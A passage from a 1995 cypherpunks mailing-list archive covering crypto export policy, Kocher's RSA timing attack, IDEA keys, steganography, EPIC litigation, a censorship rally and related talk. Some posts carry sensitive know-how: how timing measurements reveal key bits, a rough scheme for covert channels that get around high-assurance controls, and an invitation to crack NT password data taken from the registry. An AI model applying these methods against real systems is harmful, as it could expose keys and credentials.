the USML, and as a result not be allowed to show the tattoo to a foreign national in the US, nor leave the US. Note it says _technically_ above, as there was much discussion on the list re the shirts as to whether the shirt actually would ever be classified as a munition due to the impracticality of using a shirt as a distribution media, and silliness factor. We shall see wrt the shirt when and if Raph recieves a determination from his CJR for the shirt. (I would note that someone posted a while ago that they did manage to get the barcode to scan, on I think one of Joel Furr's shirts). Also the secondary claim about whether or not ITAR stipulates that a software item can be shown to a foreign national in the US seems open to debate (some say ITAR strictly interpreted does say this, others say not). Also something about the anti-ITAR fight recently which was an eye opener for me was that I took a look at Phil Karn's export page to do with his ongoing battle against ITAR as applied to crypto, with the Applied Crypto disk/book case: http://www.qualcomm.com/people/pkarn/export/ In his court transcripts there is a declaration by Phil Zimmermann in connection with the Applied Crypto case, however he (PRZ) also mentions the unofficial progress on his PGP source code book published by MIT press. PRZs declaration from bottom of: http://www.qualcomm.com/people/pkarn/export/zimm.html > 10. I believe that the commodity jurisdiction request referred on page > 28 of the Justice filing is the one which was filed by MIT Press for > my book, PGP: Source Code and Internals. I am further informally > advised that the National Security Agency has considered the Request > and recommended that the book be controlled for export under the ITAR > and that the Department of Commerce has recommended that it not be > subject to ITAR controls. Wow! If this informal info is confirmed as the NSAs determination, it will have interesting ramifications for the distinction between paper based publications and electronic. It will also reinforce Phil Karn's use of the charge of "arbitrary, [and] capricious" enforcement on the part of the NSA/ODTC, as the CJR for Applied Crypto in print form was successful. Adam From gnu at toad.com Tue Dec 12 18:48:18 1995 From: gnu at toad.com (John Gilmore) Date: Wed, 13 Dec 1995 10:48:18 +0800 Subject: Spotty c'punks service due to network outages Message-ID: <9512122235.AA14507@toad.com> Our network service is going up and down, probably due to the storms in San Francisco. If you see delays, that's the reason why. As far as I know, NSA has not figured out how to control the weather, so it's not their fault :-). John Gilmore From lyalc at mail.mpx.com.au Tue Dec 12 18:57:27 1995 From: lyalc at mail.mpx.com.au (lyal collins) Date: Wed, 13 Dec 1995 10:57:27 +0800 Subject: Timing RSA and Certificates worth ?? Message-ID: oops Earlier, I said : > >My limited mind induces me to think that a certificate become subject to timing attacks on the RSA private signing key. >In this case, certificate verification processes seem flawed and highly unreliable. I meant that on-line certificate issuing, notary and similar services where data is submitted to a system for processing/RSA encryption are subject to this for of attack. Parts of the SEPP/STT protocols appear to require this of merchants and customers. I retract my comments about ecash/echeques - I'm not sure of the implications there yet. As for SEPP/STT - another nail in the coffin, me thinks. lyal From markm at omni.voicenet.com Tue Dec 12 19:01:38 1995 From: markm at omni.voicenet.com (Mark M.) Date: Wed, 13 Dec 1995 11:01:38 +0800 Subject: Wanted: email for Calif senators & representatives In-Reply-To: <9511128188.AA818800342@snail.rsa.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Tue, 12 Dec 1995, baldwin wrote: > Can someone send me, or the list, the email addresses for > the California senators and representatives? > --Bob Baldwin > > > Here's the list: (Note: I do not know if this is complete) Barabara Boxer senator at boxer.senate.gov Dianne Feinstein senator at feinstein.senate.gov Bill Baker BBAKER at hr.house.gov George Brown TALK2GEB at hr.house.gov Anna Eshoo ANNAGRAM at hr.house.gov Sam Farr SAMFARR at hr.house.gov Vic Fazio DCAUCUS at hr.house.gov Jane Harman JHARMAN at hr.house.gov Tom Lantos TALK2TOM at hr.house.gov Zoe Lofgren ZOEGRAM at hr.house.gov Howard McKeon TELLBUCK at hr.house.gov George Miller GMILLER at hr.house.gov Ron Packard RPACKARD at hr.house.gov Nancy Pelosi SFNANCY at hr.house.gov George Radanovich GEORGE at hr.house.gov Andrea Seastrand ANDREA22 at hr.house.gov Pete Stark PETEMAIL at hr.house.gov Walter R. Tucker TUCKER96 at hr.house.gov Lynn C. Woolsey WOOLSEY at hr.house.gov If anyone wants a list of all reps and senators, you can get them at http://www.house.gov/ and ftp://ftp.senate.gov respectively. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMM4i7LZc+sv5siulAQGqAQP7B0GxtK39t+GKSY9vmxgdMfEh3pFGsjnd NzXtuZbHuHUDHtQjHY3mcLWBQupjrwy9lRMfjMzeP3sDgjuf2sLMEko94hzSUlo9 yBAvprqkRDt71cp58uZm2fSimFFxa7G4EFAx1HF/AD6iy0zD9WNF7uwkO58IRtzB l6mQKvwnFFU= =kFtx -----END PGP SIGNATURE----- finger markm at voicenet.com for Public Key http://www.voicenet.com/~markm/ Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5 -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+ b+++ DI+ D++ G+++ e! h* r! y? ------END GEEK CODE BLOCK------ From hfinney at shell.portal.com Tue Dec 12 19:13:07 1995 From: hfinney at shell.portal.com (Hal) Date: Wed, 13 Dec 1995 11:13:07 +0800 Subject: Time-based cryptanalysis: How to defeat it? Message-ID: <199512130144.RAA08950@jobe.shell.portal.com> From: futplex at pseudonym.com (Futplex) > I don't understand why Kocher's point is correct. For example, why do the > times diverge with the following modification of the modexp algorithm on > pg.2 of the abstract ? > > Algorithm to compute R = y^x mod n: > Let R_0 = 1. > Let y_0 = y. > For i = 0 upto (bits_in_x - 1): > Let M = (R_i * y_i) mod n. > Let R_(i+1) = (bit i of x) * M + > (1 - (bit i of x)) * R_i. > Let y_(i+1) = (y_i)^2 mod n. > End. I posted a similar idea on sci.crypt, but later I realized that Paul Kocher is right. Your algorithm works OK for the first iteration. The amount of work is pretty much constant regardless of whether bit 0 of x is 0 or 1. However, at the end of that iteration R_1 will have one of two different values depending on that bit 0 value. And, the attacker can know these two values, and if he controls y he can even choose them (they will be either y or 1). Now, on the next iteration, the time it takes will be different depending on bit 0 of x. It won't depend on the bit 1 value, but different bit 0 values will cause R_1 to be different. So the time of this iteration will depend on the value of the bit used in the previous iteration, and likewise for the following iterations. If the attacker can choose y, he can arrange that the two different R_1 values will take different times on average for the rest of the calculation. So he finds out bit 0 as before, and from there he can go on and find the other bits. Hal From markm at omni.voicenet.com Tue Dec 12 19:15:48 1995 From: markm at omni.voicenet.com (Mark M.) Date: Wed, 13 Dec 1995 11:15:48 +0800 Subject: IDEA encryption In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Tue, 12 Dec 1995, Ben Holiday wrote: > > The copy of the source for idea (unix) that I have specify's a user key > length of 8 bytes, but allows this to be increased to something larger. > Will increasing the user keylength improve the overall security? > IDEA uses 128-bit keys. The program must do some XORing with the user key to expand it to 16 bytes. Therefore, I would guess that it would be more secure to use a longer key. > Also, is it worth hashing the user key first, then using the hashed key > as the key for encryption and decryption? Or am I wasting my time? > It probably isn't going to help with security at all if you plan to use a hexadecimal representation of the hash as is the common output of hashing programs. The best key would be one that uses random letters, numbers, and symbols. > Last thing -- how secure is unix "rm"? If something is rm'd, is it > really really gone? > Not very secure. I have heard that there is a Linux undelete and there might be a similar program for other Unices. If the hard drive is examined using special hardware, data will be recoverable. The data should be overwritten at least five times, maybe more depending on the level of security you want, before being deleted. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMM46pLZc+sv5siulAQFZgwQAh/TFur/p9yMlTD9qM0/sT6olo6aKGjGb OGas4p939mqfPdCu4LFyD6Tcg79YA90a108IEcE+rQB4o40/zDSkvoEUOz7a6nlb vqxI6Lv8Qdv40mVmH9Bxd9OhX+Vgsb7pkTHj9ViHlw9X2xjnwOSiKAu7nRupG1Tj A3IrqyCGapA= =us1o -----END PGP SIGNATURE----- finger markm at voicenet.com for Public Key http://www.voicenet.com/~markm/ Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5 -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+ b+++ DI+ D++ G+++ e! h* r! y? ------END GEEK CODE BLOCK------ From SBinkley at atitech.ca Tue Dec 12 19:33:05 1995 From: SBinkley at atitech.ca (Scott Binkley) Date: Wed, 13 Dec 1995 11:33:05 +0800 Subject: In-Reply-To: Message-ID: A long time ago, I read about a program that would take a picture, and replace the LSB of every pixel in the picture with your message. I'm wondering, Is the source code for this program availible anywhere on the net??? From pmonta at qualcomm.com Tue Dec 12 19:33:21 1995 From: pmonta at qualcomm.com (Peter Monta) Date: Wed, 13 Dec 1995 11:33:21 +0800 Subject: Timing Cryptanalysis Attack Message-ID: <199512112111.NAA02653@mage.qualcomm.com> Kocher says this about padding to constant time: > ... If a timer is used to delay returning results until a pre-specified > time, attackers may be able to monitor other aspects of the system > performance to determine when the cryptographic computation completes. Perhaps, but an attack would be much more difficult if the monitoring must be done outside the host doing the computation (viewing a router from the outside, say, as Eric Young alludes to), since the scope for covert channels is much reduced. Peter Monta From anon-remailer at utopia.hacktic.nl Tue Dec 12 19:33:35 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Wed, 13 Dec 1995 11:33:35 +0800 Subject: Timing Cryptanalysis Attack Message-ID: <199512120058.BAA25991@utopia.hacktic.nl> "Perry E. Metzger" writes: > Timings like the ones listed are trivial to take in > establishing things like SSL sessions, or Photuris sessions. > The danger is to online protocols, not to PGP. This must be a new and interesting definition of the word "trivial" with which I was previously unfamiliar. Quite frankly, I would be extremely surprised if anyone mounted a successful hostile attack against a server's RSA certificate using timings of remotely initiated SSL sessions outside of a controlled laboratory environment. "Timing Cryptanalysis" is one of those really cute "obvious with 20-20 hindsight" discoveries, but not one which is likely to be reliably employed by an opponent except under very carefully controlled circumstances. Peter Trei and others have already outlined excellent reasons for such skepticism, so I won't bother rehashing them here. > Any reason you felt you had to say this anonymously? Yes. I wanted to try the nifty WWW-based remailer at http://www.replay.com/remailer/anon.html. Also, it's nice to have a pseudo-anonymous identity now that government regulation of the Net is looming on the horizon. Feel free to compare my writing style, margins, and quote string with other posts on the list in order to determine my likely "real life" identity. -Bourbaki 137 From banisar at epic.org Tue Dec 12 19:33:40 1995 From: banisar at epic.org (Dave Banisar) Date: Wed, 13 Dec 1995 11:33:40 +0800 Subject: EPIC Files Suit to Obtain C Message-ID: Per various people's requests, I'm only putting this piece on the list. You can get the rest of the newsletter at www.epic.org/alert/ -dave >From the EPIC Alert 2.16 ======================================================================= [2] EPIC Files Suit to Obtain Gov't Crypto Report ======================================================================= EPIC filed suit on December 4 against the U.S. Department of Commerce under the Freedom of Information Act to force the release of a survey conducted by the Department on the foreign availability of encryption software. According to Secretary of Commerce Ron Brown the study has been completed and is being held up by the White House Office of Science and Technology Policy and the National Security Agency, the two agencies most strongly pushing the Mandatory Key Escrow (MKE) initiative. Observers believe that the report will confirm the existence of a substantial amount of commercial and free software available from non-U.S. companies worldwide. An ongoing survey conducted by the Software Publishers Association has found over 450 products from 27 countries. Of those products, 179 use the U.S. Data Encryption Standard (DES). The existence of a substantial amount of commercial software overseas cuts against arguments that export controls on encryption software should be maintained. The report was created after Congress decided not to pass legislation last year that would have relaxed export controls on encryption. The legislation would have required the Department of Commerce to complete the foreign availability report by April 1995. Although the legislation was not enacted, the Commerce Department nonetheless agreed to conduct the study. More information on U.S. Cryptography Policy is available at: http://www.epic.org/crypto/ In a related development EPIC Legal Counsel David Sobel appeared before the National Institute of Standards and Technology on December 5th to offer comments on NIST's "Draft Export for Key Escrow Encryption". Sobel blasted the latest proposal for Mandatory Key Escrow (MKE) and said that the administration continues to ignore the interests of the public. EPIC also put forward seven recommendations to reform national cryptography policy. The recommendations follow from a presentation to the National Research Council earlier this year. The EPIC Statement on the NIST standard and the EPIC proposal for cryptography policy is available at: http://www.epic.org/crypto/EPIC_Statement.html _________________________________________________________________________ Subject: EPIC Files Suit to Obtain Crypto... _________________________________________________________________________ David Banisar (Banisar at epic.org) * 202-544-9240 (tel) Electronic Privacy Information Center * 202-547-5482 (fax) 666 Pennsylvania Ave, SE, Suite 301 * HTTP://www.epic.org Washington, DC 20003 * ftp/gopher/wais cpsr.org From daw at bamako.CS.Berkeley.EDU Tue Dec 12 19:33:56 1995 From: daw at bamako.CS.Berkeley.EDU (David A Wagner) Date: Wed, 13 Dec 1995 11:33:56 +0800 Subject: More FUD from First Virtual [NOISE] In-Reply-To: <0kn1Q6CMc50e02irtU@nsb.fv.com> Message-ID: <199512112215.RAA13271@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <0kn1Q6CMc50e02irtU at nsb.fv.com>, Nathaniel Borenstein wrote: > It's fundamentally different because FV (unlike all the other systems, > to my knowledge) is a "closed loop" financial instrument. [ ... FV is inherently harder to crack than systems which actually use encryption, etc. etc., NB claims ... ] Is it just me, or does this sound like a challenge? Personally, I'd much rather see a true e-cash system (like Digicash's) succeed than some pay-by-cleartext-email non-anonymous system. Maybe Sameer will create a Hack FV page :-) Or maybe NB will offer a $1000 bug bounty to anyone who can successfully forge a transaction in FV's system (since it's so foolproof)... - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMMytkyoZzwIn1bdtAQEY+AF/bGZOi37IlT0LTWz8zhMFM4JqZ2iSchrm Z3abBPc1MZxxDuG06NT3FCft9+eM13Fb =yXp4 -----END PGP SIGNATURE----- From pfarrell at netcom.com Tue Dec 12 19:34:00 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Wed, 13 Dec 1995 11:34:00 +0800 Subject: ViaCrypt supports CKE in PGP Message-ID: <80361.pfarrell@netcom.com> In message Mon, 11 Dec 1995 14:45:55 -0600, "Robichaux, Paul E" writes: > In today's mailbox I got a pack of marketing slicks from ViaCrypt. [liberally elided] > The biggie, though, are these: > "Encryption automatically includes Corporate Access Key as > additional recipient (option)" and > "Key selection/display dialogs show only keys certified by > Corporate Access Key (option)" > So, real CKE will soon be available from an unexpected source. I'm not > sure whether to be excited or dismayed. I believe this is a good thing (tm). This is a vendor with strong crypto implementing Key Escrow for the only known commercially viable market: data recovery of long term storage. In all of the NIST meetings that I've attended, industry says there is a market for key escrow for data recovery when your key programmer "falls in love and moves to a warm water island" They also say there is no market for key escrow for communication, we can simply resend lost messages. Commercial Key Escrow is, by definition, voluntary. You have to pay to get it escrowed, stored, and returned. CKE is not GAK. I bet its not exportable. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From jcobb at ahcbsd1.ovnet.com Tue Dec 12 19:34:09 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Wed, 13 Dec 1995 11:34:09 +0800 Subject: Plea for information Message-ID: Friend, On 12 07 95 you sent a Plea for information to cypherpunks- @toad.com. You said: I would be interested in learning more about the politics and mathematics of cryptography.... [snip] ...I would like to know how best to understand cryptography - I have a textbook on the basic mathematical concepts under- lying the techniques but it is too advanced for my current knowledge in this field (A-level - ie. end of high school), please can you suggest a good starting place for me. I suggest you lay aside the maths for a time and buy a copy of: Bruce Schneier E-Mail Security. How to Keep Your Electronic Messages Private John Wiley & Sons, Inc 1995 I enquired this morning at Wiley's NY office and was told: (a) the book is available in the UK (b) the phone number of Wiley's Chichester office is 44 1243 779 777 Here's the book's Contents in Brief: Part I: Privacy and Electronic Mail Chapter 1: The Problem Chapter 2: Encryption Chapter 3: Key Management Chapter 4: Authentication Chapter 5: Certificates Chapter 6: Keeping Your Private Key Private Chapter 7: Odds and Ends Chapter 8: Patents, Governments, and Export Laws Part II: Achieving Electronic-Mail Privacy Chapter 9: Requirements and Features Chapter 10: Privacy Enhanced Mail (PEM) Chapter 11: Pretty Good Privacy (PGP) Chapter 12: Comparing PGP and PEM Chapter 13: Attacks Against PGP and PEM Appendix A: Pretty Good Privacy Appendix B: Privacy Enhanced Mail Index Appendix A = PGP User's Guide. Volume I: Essential Topics. Appendix B = Request for Comments: 1421. To study the book --not the same thing as just reading it-- you will need PGP to experiment with. An ingenious lad should have little trouble... After you have some concrete experience, it'll be easier to see the relevance of the maths. As regards "the politics...of cryptography," this excerpt from the book's Foreward by William Murray should pique your interest: To the extent that E-mail proves to be important, we can expect to see many attempts on the part of government to coopt it in much the same way that they have coopted the paper mail system. The excuses that it will use to do so will be related to security. It will repeat the claim of Cromwell's government ["many dangerous and wick- ed designs...are daily contrived against the welfare of this Commonwealth"] and will create whatever evidence is required to convince the people of the validity of the claim. Arguments to the contrary notwithstanding, the real motive will be to maintain political control and influence. Oklahoma? Whatever... Cordially, Jim From jya at pipeline.com Tue Dec 12 19:34:14 1995 From: jya at pipeline.com (John Young) Date: Wed, 13 Dec 1995 11:34:14 +0800 Subject: KOC_her Message-ID: <199512111231.HAA02647@pipe4.nyc.pipeline.com> 12-11-95. NYPaper Page One: John Markoff reports on Paul Kocher's paper on the timing attack vulnerability of public-key encryption. Quotes Matt Blaze, Bruce Scheiner, Ron Rivest, Martin Hellman, James Bidzos. KOC_her (11 kb) From dlv at bwalk.dm.com Tue Dec 12 19:39:56 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Wed, 13 Dec 1995 11:39:56 +0800 Subject: Pornographic stories In-Reply-To: <9512122251.AA03113@envirolink.org> Message-ID: Daniel Miskell writes: > A&SUser writes: > >Hey, I'm Molly, and I know I sent you a bit of mail a couple of days ago. > > I'm not sure how you do your Pornographic server, so I'll just ask > >again. I know I would be VERY gratful if you could send me any XXX > >stories, I love to read them. I could reward you over the net somehow > >I'm sure. > >my adress is mphillips at cctr.umkc.edu > > > >Thanks....I'll be waiting. > > > What the hell are you talking about?? This is the cypherpunks mailing list!! > Jeses, try alt.sex.stories. :P If you can read Russian, you can read pornography on soc.culture.russian. :) I too fail to see the cryptorelevance of this thread... Unless alt.sex.stories is used for steganography... Alice wants to send a secret message to Bob, so she posts a porn story to alt.sex.stories, where the key phrase is "That was the best sex I've ever had", which sounds like a mild hyperbole to most people; only Bob knows that it really means "the bomb is scheduled to detonate at midnight." But what's it got to do with writing code??? :) :) (Does Molly=Lance?) --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From gnu at toad.com Tue Dec 12 20:18:22 1995 From: gnu at toad.com (John Gilmore) Date: Wed, 13 Dec 1995 12:18:22 +0800 Subject: Thursday noon, SF: Meatspace rally against cyberspace censorship Message-ID: <9512130233.AA20672@toad.com> Monday's rally was canceled on account of rain. There is now a backup location in case of rain on Thursday. Check the web page before you leave, or come to South Park, and the backup location will be close by. See you there! -- John Date: Tue, 12 Dec 1995 18:15:44 -0800 (PST) From: protest at wired.com (--Todd Lappin-->) Subject: SF RALLY -- THURSDAY This is an updated announcement for Thursday's Rally Against Censorship, with the current list of speakers. The rally will take place rain or shine, so hope for the best, bring an umbrella, and spread the word. Thanks! *** NETIZENS!! RALLY AGAINST CENSORSHIP *** Thursday, December 14, 1995 at South Park, 12:00 - 1:00 PM San Francisco, California -- Rain or Shine! -- **PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST ** Amendment I: "Congress shall make no law ... abridging the freedom of speech, or of the press; or the right of the people peaceably to assemble." **PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST ** It's like illiterates telling you what to read. On December 6 members of the House Conference Committee on Telecommunications Reform approved a proposal to censor free speech in cyberspace. If the measures are adopted, the Net and online media will become the most heavily regulated media in the United States. They *will not* enjoy the First Amendment freedoms now afforded to print media. Instead, online publishers and users will be held to a vague and patently un-Constitutional "indecency" standard. "Violators" will be subject to fines of up to $100,000 and prison terms of up to five years. In response, ALL members of the Bay Area media, online, Internet, new media, and telecommunications communities are invited to participate in a protest rally to express our outrage that the politicians in Congress (which is not even connected to the Internet!) are attempting to destroy our First Amendment rights in cyberspace, and directly attack our livelihoods. Help stop the demagogues in Washington! There is nothing "decent" about denying free speech to us, our children, and our children's children. Preserve our Constitutional rights! Join us! WHEN: Thursday, December 14, 1995 12:00 - 1:00 PM WHERE: South Park (between 2nd and 3rd, Bryant and Brannan) San Francisco. (In the event of rain, an indoor location will be announced) SPEAKERS:Mike Godwin, EFF; John Gilmore, co-founder, EFF; Denise Caruso, New York Times columnist; Jim Warren, online activist; Howard Rheingold, author; Dave Winer, essayist and software developer; Audrie Krause, Executive Director, CPSR; Jonathan Steuer, CEO, Cyborganic Corp; Michael Goldberg, Publisher, Addicted To Noise. BRING: Attention-grabbing posters, signs, and banners that demonstrate your committment to free speech and expression, and your feelings about Congress. FOR UPDATED INFORMATION: http://www.hotwired.com/staff/digaman (Although this event is being organized in the offices of Wired magazine and HotWired, we are *actively* seeking participation and support from all members of the local community. Please forward this message to anyone you think should attend, and to all relevant news groups.) CONTACT: Todd Lappin -- 415-222-6241 -- protest at wired.com From matt at lordmuck.itd.uts.edu.au Tue Dec 12 21:45:07 1995 From: matt at lordmuck.itd.uts.edu.au (Jas (Matthew K)) Date: Wed, 13 Dec 1995 13:45:07 +0800 Subject: Using quantum cryptography to effect covert channels Message-ID: <199512130321.OAA12208@lordmuck.itd.uts.edu.au> B2,3 and A1 system (Orange book), use covert channel analysis to prevent leakages of information (intentional or otherwise). This forms a part of enforcing MAC on such systems. well recently i thought of a method to overcome these barriers so covert channels can again be used to transmit and receive from such machines. this method involves using quantum cryptography. "randomization" is one method used to prevent covert channels, however it is this "randomization" that can be used with quantum crypto to not only make covert channels, but also makes the covert channels secure as well as authenticated! basically quantum crypto uses the fact that observing a system modifies the system. this works on machines that use "randomization" as a method of detering covert channels. ObExample, if an admin gets suspicious of certain behaviour on a machine, the machine behaves differently if he tries to investigate it (as a result of "poking around" the machine to see what is going on). this can be used with quatum crypto methods to covertly communicate data (with security and authentification), and if someone attempts to "observe" the behaviour on the said machines, it will break the communication (because the machine behaviour changes, hence breaks the message) rendering the message unreadable. this may slow down communication some, and will need self-synchronization of some sort, but at least you can communicate. this idea is very rough however, and there may be gaping holes in my arguments, but i think it might be an area someone may wish to look into (especially the high assurance types). i really should write a draft paper on this, but i dont really have a good enough understanding of the formal methods to pull it off. however i have got a coining name for this method, "covert quantum channels". just a random thought to throw around... Matt -- #!/bin/sh echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit Matthew Keenan Systems Programmer Information Technology Division University of Technology Sydney Australia It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is. -- Rob Pike From fc at all.net Tue Dec 12 21:49:58 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Wed, 13 Dec 1995 13:49:58 +0800 Subject: Time-based cryptanalysis: How to defeat it? In-Reply-To: <199512130144.RAA08950@jobe.shell.portal.com> Message-ID: <9512130320.AA22567@all.net> > From: futplex at pseudonym.com (Futplex) > > I don't understand why Kocher's point is correct. For example, why do the > > times diverge with the following modification of the modexp algorithm on > > pg.2 of the abstract ? > > > > Algorithm to compute R = y^x mod n: > > Let R_0 = 1. > > Let y_0 = y. > > For i = 0 upto (bits_in_x - 1): > > Let M = (R_i * y_i) mod n. > > Let R_(i+1) = (bit i of x) * M + > > (1 - (bit i of x)) * R_i. > > Let y_(i+1) = (y_i)^2 mod n. > > End. > > I posted a similar idea on sci.crypt, but later I realized that Paul Kocher > is right. > > Your algorithm works OK for the first iteration. The amount of work is > pretty much constant regardless of whether bit 0 of x is 0 or 1. > However, at the end of that iteration R_1 will have one of two > different values depending on that bit 0 value. And, the attacker can > know these two values, and if he controls y he can even choose them > (they will be either y or 1). I think that a lot of chosen plaintext attacks work regardless of timing analysis. For example, there is a well known chosen plaintext attack against the RSA. The deeper issue is that all of the efficient algorithms for modular exponentiation take more time for 1s than for 0s. So the way to get security is to sacrifice efficiency (a widely known but rarely proven reality). -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From hal at martigny.ai.mit.edu Tue Dec 12 22:10:10 1995 From: hal at martigny.ai.mit.edu (Hal Abelson) Date: Wed, 13 Dec 1995 14:10:10 +0800 Subject: Computers, Freedom, and Privacy Conference -- Registration Open Message-ID: <9512130408.AA22004@toad.com> Please redistribute widely **************************************** The Sixth Conference on Computers, Freedom, and Privacy will take place at the Massachusetts Institute of Technology on March 27-30, 1996. CFP96 is hosted by MIT and by the World Wide Web Consortium. You can register for CFP96 by US Mail, by fax, or via the World Wide Web. Conference attendance will be limited. Due to the enormous public interest in CFP issues over the past year, we encourage you to register early. SPECIAL NOTE TO STUDENTS: There are a limited number of places available at a special student rate. These will be allotted on a first-come first-served basis, so register as soon as possible. For more information, see the CFP96 Web page at http://web.mit.edu/cfp96 or send a blank email message to cfp96-info at mit.edu Since its inception in 1991, the series of CFP conferences has brought together experts and advocates from the fields of computer science, law, business, public policy, law enforcement, government, and many other areas to explore how computer and telecommunications technologies are affecting freedom and privacy. Events planned for this year's conference include: - Federal prosecutors square off against civil-liberties lawyers in a mock Supreme Court test of the "Cryptography Control Act of 1996", which criminalizes non-escrowed encryption. - Authors Pat Cadigan, Tom Maddox, Bruce Sterling, and Vernor Vinge divine the future of privacy. - College administrators, students, lawyers, and journalists role-play scenarios that plumb the limits of on-line expression on campus networks. - Panels on international issues in privacy and encryption; on the struggle to control controversial content on the Internet; on tensions between copyright of digital information and freedom of expression; on threats posed by electronic money to law enforcement, privacy, and freedom; on mass communication versus mass media. From cabeen at netcom.com Tue Dec 12 22:13:22 1995 From: cabeen at netcom.com (Ted Cabeen) Date: Wed, 13 Dec 1995 14:13:22 +0800 Subject: NT Password Security Update. Registry values changed! Message-ID: <2.2b7.32.19951213071131.00316644@netcom14.netcom.com> Well, I did some more research into the NT password security issue and I discovered that I can get access to the Security section of the registry and there are some VERY interesting values there, stored as raw hex. I created a test user and checked the values of these registry keys with two different passwords and iterestingly enough the data in the keys changed when I changed the password. I plan on doing some more work, including changing the values and seeing if the password change, but I've been somewhat busy lately. I've st up a web page at http://shadowland.rh.uchicago.edu/ntcrypto.html that has the password I used and the data in the two registry values that changed when I changed the password. I invite people to look at it and speculate what the change means. Also, I can provide a few more plaintext/cyphertext pairs if necessary. The change in the values could be something like update time, but I don't think that they'd store that as raw hex, espically hex as long as the stuff I got. Good luck figuring it out. _____________________________________________________________________________ Ted Cabeen cabeen at netcom.com Finger for PGP Public Key secabeen at midway.uchicago.edu "I have taken all knowledge to be my province." cococabeen at aol.com From unicorn at schloss.li Tue Dec 12 22:25:09 1995 From: unicorn at schloss.li (Black Unicorn) Date: Wed, 13 Dec 1995 14:25:09 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: Message-ID: On Tue, 12 Dec 1995, Brian Davis wrote: > On Tue, 12 Dec 1995, David E. Smith wrote: > > > At 04:45 AM 12/12/95 -0500, Black Unicorn wrote: > > > > >> | PS - I think Paul was a bit surprised when Jim Barksdale pulled > > >> | out his wallet and handed him 10 crisp $100 bills. :-) > > >> Great. mention it where the IRS is sure to be listening. :) > > >Why would the IRS listen? Everyone knows the tax system is voluntary. > > > > Do you know something I don't? :) > > Would you mind sharing? :) Apparently so. It's called 'sarcasm' > > Try misc.taxes for the tax protestor arguments (which fail of course). > But by asking, you may be on "their" list (and I don't mean a list held > by tax protestors but by a TLA). And if you're reallllllly bad about it, > one of my buddies may decide to invite you in ... > > EBD > > > > > > Dave > > ----- David E. Smith, c/o Southeast Missouri State University > > 1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814 > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From unicorn at schloss.li Tue Dec 12 22:46:47 1995 From: unicorn at schloss.li (Black Unicorn) Date: Wed, 13 Dec 1995 14:46:47 +0800 Subject: Netscape announces position against GAK In-Reply-To: <199512121939.OAA17633@www2.clever.net> Message-ID: On Tue, 12 Dec 1995, Ginger Warbis wrote: > >On Fri, 8 Dec 1995, James A. Donald wrote: > > > >> At 04:27 AM 12/9/95 -0800, Timothy C. May wrote: > >> >Credit where credit is due. > >> > > >> >I for one am satisfied--and even pleased--with the Netscape position on GAK. > >> > >> Well I for one, am serious unsatisfied, but it is not so bad as > >> to merit a campaign against Netscape. > > > >I think it's a good start. I would like to see how much effort after > >this really pans out. Doesn't take much to put out a policy statement. > >Takes a lot to follow it through. > > > > Greetings all. May I also point out that the power of self government is at > least as effective when rewarding good behavior as when punishing bad. You > guys are the experts in this particular political niche, but from the > viewpoint of a more or less innocent stander-by, the statement sounded to me > like "OK, we went, we listened, they were full of shit, the line is HERE." > and I'm quite satisfied. I haven't seen 'good behavior' worth much notice yet. Like I said, it takes about 10 minutes to come up with a written policy. Netscape may have done more than that, but who's to say? I'll be impressed when I see a sustained record of activism on the issue. Till then they are slimy corporate types. Which, IMHO, is fine so long as they don't claim to be anything else. > -- > Bill & or Ginger Warbis > WebMaster at Fornits.com - http://fornits.com/ > "The more corrupt the state, the more numerous the laws." > Tacitus, Roman senator and historian (A.D. c.56- c.115) > > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From devin at lm.com Tue Dec 12 23:00:54 1995 From: devin at lm.com (Tod McQuillin) Date: Wed, 13 Dec 1995 15:00:54 +0800 Subject: PGP/PINE integration Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I've modified PINE 3.91 to support PGP encryption from within its message editor. I did the same thing for pine 